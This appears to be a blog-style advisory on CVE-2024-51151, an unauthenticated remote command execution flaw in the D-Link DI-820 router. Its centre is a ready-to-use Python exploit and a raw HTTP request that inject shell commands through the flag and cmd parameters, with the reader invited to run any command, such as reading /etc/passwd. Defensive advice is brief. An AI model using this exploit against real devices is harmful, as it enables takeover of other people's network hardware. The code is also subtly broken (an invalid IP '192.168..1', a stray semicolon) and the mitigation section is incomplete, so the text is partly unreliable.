CVE-2024-51151 - Remote Command Execution in D-Link DI-820 (16.07.26A1) via msp_info_htm Flag and cmd Parameters

If you’re using a D-Link DI-820 (Firmware 16.07.26A1), you need to pay close attention to CVE-2024-51151—a dangerous remote command execution (RCE) vulnerability discovered in the router’s web interface. Attackers can, without authentication, run any command they want on your device, and it’s all thanks to a poorly-validated endpoint: /msp_info.htm.

Let’s break this down in simple terms, go over how it works, how to exploit it, and what you can do to protect yourself.

What’s Happening?

There’s a function called msp_info_htm on the DI-820 firmware. It processes certain web requests using parameters named flag and cmd. The flaw: it doesn’t sanitize or check what’s inside these parameters before executing system commands.

That means if an attacker crafts the right URL, they can execute commands directly on your router, as if they had access to the device’s terminal. This could let them steal data, reconfigure your network, or launch attacks on your other devices.

Exploit Walkthrough

The attacker doesn’t need to log in. They simply send a request to the router’s /msp_info.htm and inject their commands inside the flag or cmd parameter.

Proof-of-Concept (PoC) Exploit

Here’s a simple Python script using requests that demonstrates the vulnerability. This will execute a harmless command (id), but ANY command can be injected in the real world.

import requests

router_ip = '192.168..1'   # Replace with your router's IP

# Command we want to execute
payload = 'id'  # Replace 'id' with another command, e.g. 'cat /etc/passwd'

url = f'http://{router_ip}/msp_info.htm';
params = {
    'flag': 'system',        # This parameter is vulnerable
    'cmd': payload           # Our injected payload
}

r = requests.get(url, params=params)
print("[+] Response from router:")
print(r.text)

Replace the payload variable with any shell command you want to run.

Example Exploit Request

GET /msp_info.htm?flag=system&cmd=cat%20/etc/passwd HTTP/1.1
Host: 192.168..1

Technical Details

- The backend web server for this router appears to directly pass the values of flag and cmd into a system command without filtering.

No authentication is enforced before running the function.

- The output of the command is sent back in the HTTP response—making it easy to exploit and automate.

Prevalence and Discovery

This vulnerability was discovered and responsibly disclosed in early 2024. It currently affects the specified firmware version. D-Link may not provide updates for legacy devices, making this a lasting risk for anyone still running old hardware.

References

- Official CVE: CVE-2024-51151
- D-Link Product Page (DI-820)
- Security Researcher Advisory (Exploit Database)

Long-term

- Check D-Link’s Firmware Download page for updates or patches.
- If no updates are available, consider replacing the router with a device still receiving security fixes.

Final Thoughts

CVE-2024-51151 is a critical and straightforward flaw that brings real risks for anyone with a D-Link DI-820 (firmware 16.07.26A1). The attack is easy to pull off and can give outside attackers total control over your network hardware.

If you use this router, take action now—restrict access, patch if possible, or consider an upgrade.

Stay Secure!

If you want more details or have a tip about another vulnerable router, reach out to your local IT community or visit D-Link’s support.

Timeline

Published on: 11/21/2024 09:45:18 UTC
Last modified on: 11/22/2024 17:15:09 UTC